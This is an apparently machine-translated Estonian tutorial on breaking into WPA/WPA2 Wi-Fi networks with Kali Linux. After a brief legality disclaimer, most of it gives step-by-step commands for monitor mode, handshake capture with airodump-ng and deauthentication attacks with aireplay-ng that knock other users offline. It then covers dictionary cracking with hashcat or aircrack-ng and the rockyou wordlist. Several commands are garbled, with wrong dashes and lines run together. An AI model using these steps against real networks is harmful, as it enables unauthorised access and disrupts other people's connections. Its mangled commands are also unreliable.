Kuidas häkkida WPA/WPA2 Wi-Fi Kali Linuxiga

See Selgitatud õpetab, kuidas Kali Linuxiga häkkides teada saada WPA või WPA2 võrgu parool.

1
Saate aru, millal saate WiFi-võrku legaalselt häkkida. Enamikus piirkondades saate WPA- või WPA2-võrku häkkida ainult siis, kui võrk kuulub teile või kellelegi, kes on andnud teile selgesõnalise nõusoleku võrku häkkida. Võrkude häkkimine, mis ei vasta ülaltoodud kriteeriumidele, on ebaseaduslik. ja võib kujutada endast föderaalset kuritegu.

2
Laadige alla Kali Linuxi ketta pilt. Kali Linux on eelistatud tööriist WPA ja WPA2 häkkimiseks. Kali Linuxi installipildi (ISO) saate alla laadida järgmiselt: minge oma arvuti veebibrauseris aadressile https://www.kali.org/downloads/.Klõpsake HTTP selle Kali versiooni kõrval, mida soovite kasutada.Oodake faili allalaadimise lõpetamiseks.

3
Ühendage arvutiga mälupulk. Selle protsessi jaoks peate kasutama mälupulka, millel on vähemalt 4 gigabaiti ruumi.

4
Muutke oma mälupulk buutitavaks. See on vajalik selleks, et saaksite kasutada USB-mälupulka installikohana.Selleks sammuks saate kasutada ka Maci.

5
Asetage Kali Linuxi ISO-fail mälupulgale. Avage välkmälu, seejärel lohistage allalaaditud Kali Linuxi ISO-fail välkmäluseadme aknasse. Pärast selle protsessi lõpetamist jätke USB-mälupulk kindlasti vooluvõrku.

6
Installige Kali Linux. Kali Linuxi installimiseks oma arvutisse tehke järgmist.Paluge Windowsi arvutil taaskäivitada.Sisenege BIOS-i menüüsse.Määrake arvuti USB-draivilt käivitama, leides jaotise „Boot Options” (või sarnane) ja valides oma USB-draivi nimi ja teisaldage see loendi ülaossa.Salvestage ja väljuge, seejärel oodake, kuni ilmub Kali Linuxi installiaken (võib-olla peate oma arvuti veel kord taaskäivitama).Järgige Kali Linuxi installiviipasid.

7
Ostke jälgimist toetav Wi-Fi-kaart. Wi-Fi-kaarte leiate Internetist või tehnikakaubamajadest. Veenduge, et teie Wi-Fi-kaart võimaldaks jälgimist (RFMON), vastasel juhul ei saa te võrku häkkida.Paljudel arvutitel on sisseehitatud RFMON-i Wi-Fi-kaardid, nii et võiksite proovida funktsiooni nelja esimest sammu. järgmine osa enne selle ostmist.Kui kasutate Kali Linuxi virtuaalmasinas, vajate WiFi-kaarti olenemata teie arvuti kaardist.

8
Logige oma Kali Linuxi arvutisse sisse administraatorina. Sisestage sisselogimisel oma juurkasutajanimi ja parool. Peate häkkimise ajal olema kogu aeg oma juurkontol.

9
Ühendage Wi-Fi-kaart Kali Linuxi arvutiga. Seda tehes palutakse kaardil kohe alustada draiverite seadistamist ja allalaadimist; kui küsitakse, järgige seadistamise lõpuleviimiseks ekraanil kuvatavaid juhiseid. Kui olete selle toiminguga lõpetanud, võite jätkata valitud võrgu häkkimist. Kui olete kaardi juba varem arvutis seadistanud, peate selle ikkagi Kali Linuxi jaoks seadistama, ühendades selle siin. Enamikul juhtudel piisab selle seadistamiseks lihtsalt kaardi arvuti külge kinnitamisest.

10
Avage oma Kali Linuxi arvuti terminal. Otsige üles ja klõpsake terminali rakenduse ikoon, mis sarnaneb musta kastiga, millel on valge “>_”. Terminali avamiseks võite ka lihtsalt vajutada Alt+Ctrl+T.

11
Sisestage Aircrack-ng installikäsk. Sisestage järgmine käsk ja vajutage sisestusklahvi ↵ Enter: sudo apt-get install aircrack-ng

12
Sisestage oma parool, kui seda küsitakse. Sisestage parool, mida kasutate arvutisse sisselogimiseks, ja vajutage seejärel sisestusklahvi ↵. See võimaldab juurjuurdepääsu kõikidele muudele terminalis käivitatavatele käskudele. Kui avate mõne muu terminali akna (nagu saate selles artiklis hiljem), peate võib-olla käivitama käsu sudo prefiksiga ja/või sisestama oma parooli uuesti.

13
Installige Aircrack-ng. Kui küsitakse, vajutage Y, seejärel oodake, kuni programm on installimise lõpetanud.

14
Lülitage airmon-ng sisse. Sisestage järgmine käsk, seejärel vajutage ↵ Enter.airmon-ng

15
Leidke monitori nimi. Selle leiate veerust “Liides”. Kui häkkite oma võrku, kannab see tavaliselt nime “wlan0”. Kui te monitori nime ei näe, ei toeta teie WiFi-kaart jälgimist .

16
Alustage võrgu jälgimist. Seda saate teha, tippides järgmise käsu ja vajutades klahvi Enter:airmon-ng start wlan0Asendage “wlan0” kindlasti sihtvõrgu nimega, kui see erineb.

17
Luba monitorirežiimi liides. Sisestage järgmine käsk: iwconfig

18
Lõpetage kõik protsessid, mis tagastavad vigu. Mõnel juhul on teie Wi-Fi-kaart vastuolus teie arvutis töötavate teenustega. Saate need protsessid peatada, sisestades järgmise käsu: airmon-ng check kill

19
Vaadake üle monitori liidese nimi. Enamikul juhtudel on nimi midagi sellist nagu “mon0” või “wlan0mon”.

20
Öelge oma arvutile lähedalasuvaid ruutereid kuulama. Kõigi levialas olevate ruuterite loendi vaatamiseks sisestage järgmine käsk: airodump-ng mon0Veenduge, et asendate “mon0” mis tahes teie monitori liidese nimega, mis oli viimases etapis.

21
Leidke ruuter, mida soovite häkkida. Iga tekstistringi lõpus näete nime; leidke see, mis kuulub võrku, millesse soovite sisse murda.

22
Veenduge, et ruuter kasutaks WPA- või WPA2-turvalisust. Kui näete võrgu nimest vasakul kohe “WPA” või “WPA2”, võite jätkata; vastasel juhul ei saa te võrku häkkida.

23
Pange tähele ruuteri MAC-aadressi ja kanali numbrit. Need teabekillud asuvad võrgu nimest vasakul: MAC-aadress See on teie ruuteri rea vasakpoolses servas olev numbririda. Kanal See on number (nt 0, 1, 2 jne) otse. WPA- või WPA2-sildist vasakul.

24
Jälgige valitud võrku käepigistuse jaoks. Käepigistus tekib siis, kui üksus ühendub võrku (nt kui teie arvuti ühendub ruuteriga). Sisestage järgmine kood, asendades kindlasti käsu vajalikud komponendid oma võrgu teabega: airodump-ng -c kanal –bssid MAC -w /root/Desktop/ mon0Asenda “kanal” kanali numbriga, mille leidsite viimases samm.Asendage “MAC” viimases etapis leitud MAC-aadressiga.Ärge unustage asendada “mon0” mis tahes liidese nimega. Siin on näide aadressist:airodump-ng -c 3 –bssid 1C:1C:1E: C1:AB:C1 -w /root/Desktop/ wlan0mon

25
Oodake, kuni ilmub käepigistus. Kui näete ekraani paremas ülanurgas rida sildiga “WPA käepigistus:”, millele järgneb MAC-aadress, võite jätkata. Kui te ei ole ootavas tujus, saate kätlemise sundida sulgemise abil. rünnata enne selle osaga jätkamist.

26
Väljuge rakendusest airodump-ng, seejärel avage töölaud. Väljumiseks vajutage klahvikombinatsiooni Ctrl+C, seejärel veenduge, et näeksite arvuti töölaual faili “.cap”.

27
Nimetage oma “.cap”-fail ümber. Kuigi see pole tingimata vajalik, muudab see hiljem töötamise lihtsamaks. Sisestage nime muutmiseks järgmine käsk, asendades kindlasti “name” mis tahes nimega, mida soovite failile nimetada:mv ./-01.cap name.cap Kui teie faili “.cap” nimi ei ole “-01.cap” “, asendage “-01.cap” mis tahes faili “.cap” nimega.

28
Teisendage fail “.cap” vormingusse “hccapx”. Seda saate teha Kali Linuxi konverteri abil. Sisestage järgmine käsk, asendades kindlasti “name” oma faili nimega:cap2hccapx.bin nimi.cap nimi.hccapxVõite ka minna aadressile https://hashcat.net/cap2hccapx/ ja laadida üles faili “.cap” teisendaja, klõpsates nuppu Vali fail ja valides oma faili. Kui fail on üles laaditud, klõpsake selle teisendamiseks nuppu Teisenda ja seejärel laadige see enne jätkamist tagasi oma töölauale.

29
Installige naive-hashcat. Seda teenust kasutate parooli murdmiseks. Sisestage järjekorras järgmised käsud: sudo git clone https://github.com/brannondorsey/naive-hashcatcd naive-hashcatcurl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases /download/data/rockyou.txtKui teie arvutil pole GPU-d, peate selle asemel kasutama aircrack-ng.

30
Käivita naiivne-hashcat. Kui installimine on lõpetatud, sisestage järgmine käsk (veendudes, et asendate kõik “name” eksemplarid oma “.cap” faili nimega): HASH_FILE=name.hccapx POT_FILE=name.pot HASH_TYPE=2500 ./naive-hashcat.sh

31
Oodake, kuni võrgu parool murtakse. Kui parool on lahti murtud, lisatakse selle string kataloogis “naive-hashcat” leitud faili “name.pot”; sõna või fraas pärast stringi viimast koolonit on parool. Parooli lahtimurdmine võib kesta mõnest tunnist mõne kuuni.

32
Laadige alla sõnaraamatu fail. Kõige sagedamini kasutatav sõnastikufail on “Rock You”. Saate selle alla laadida, sisestades järgmise käsu:curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txtPidage meeles, et aircrack-ng ei ole suudab murda WPA või WPA2 parooli, kui parool pole sõnaloendis.

33
Öelge aircrack-ng-le, et ta alustaks parooli murdmist. Sisestage järgmine käsk, kasutades selleks kindlasti vajalikku võrguteavet: aircrack-ng -a2 -b MAC -w rockyou.txt name.capKui murrate WPA2 võrgu asemel WPA võrku, asendage “-a2 ” koos -a. Asendage “MAC” eelmises jaotises leitud MAC-aadressiga. Asendage “nimi” oma “.cap” failinimega.

34
Oodake, kuni Terminal kuvab tulemused. Kui näete teadet “VÕTI LEITUD!” ilmub pealkiri, aircrack-ng leidis parooli. Parool kuvatakse sulgudes lahtrist “LEITUD VÕTI!” pealkiri.

35
Saage aru, mida surmarünnak teeb. Surmarünnakud saadavad ruuterile, millesse proovite sisse murda, pahatahtlikud autentimise tühistamise paketid, põhjustades Interneti-ühenduse katkestamise ja paludes Interneti-kasutajal uuesti sisse logida. Kui kasutaja uuesti sisse logib, antakse teile käepigistus.

36
Jälgige oma võrku. Sisestage järgmine käsk ja sisestage kindlasti oma võrgu teave, kui vaja:airodump-ng -c kanal –bssid MACNäiteks:airodump-ng -c 1 –bssid 9C:5C:8E:C9:AB:C0

37
Oodake, kuni miski loob võrguga ühenduse. Kui näete kõrvuti kahte MAC-aadressi (ja nende kõrval tekstistringi, mis sisaldab tootja nime), võite jätkata. See näitab, et klient (nt arvuti) on nüüd võrguga ühendatud.

38
Avage uus terminali aken. Selleks võite lihtsalt vajutada Alt + Ctrl + T. Veenduge, et airodump-ng töötaks endiselt taustal terminaliaknas.

39
Saatke surmapaketid. Sisestage järgmine käsk, asendades kindlasti oma võrgu teabe: aireplay-ng -0 2 -a MAC1 -c MAC2 mon0″2″ viitab saadetavate pakettide arvule. Saate seda arvu suurendada või vähendada, kuid pidage meeles, et rohkem kui kahe paketi saatmine võib põhjustada märgatavat turvarikkumist.Asendage “MAC1” taustal terminali akna allservas vasakpoolseima MAC-aadressiga.Asendage “MAC2” järgmisega kõige parempoolsem MAC-aadress taustal terminali akna allosas.Ärge unustage asendada “mon0” oma liidese nimega, mille leidsite, kui arvuti algselt ruutereid otsis.Näidekäsk näeb välja selline:aireplay-ng -0 3 – a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

40
Avage uuesti algne terminali aken. Kui olete surmapakettide saatmise lõpetanud, minge tagasi taustterminali aknasse.

41
Otsige käepigistust. Kui näete silti “WPA käepigistus:” ja selle kõrval olevat aadressi, võite jätkata oma võrku häkkimist.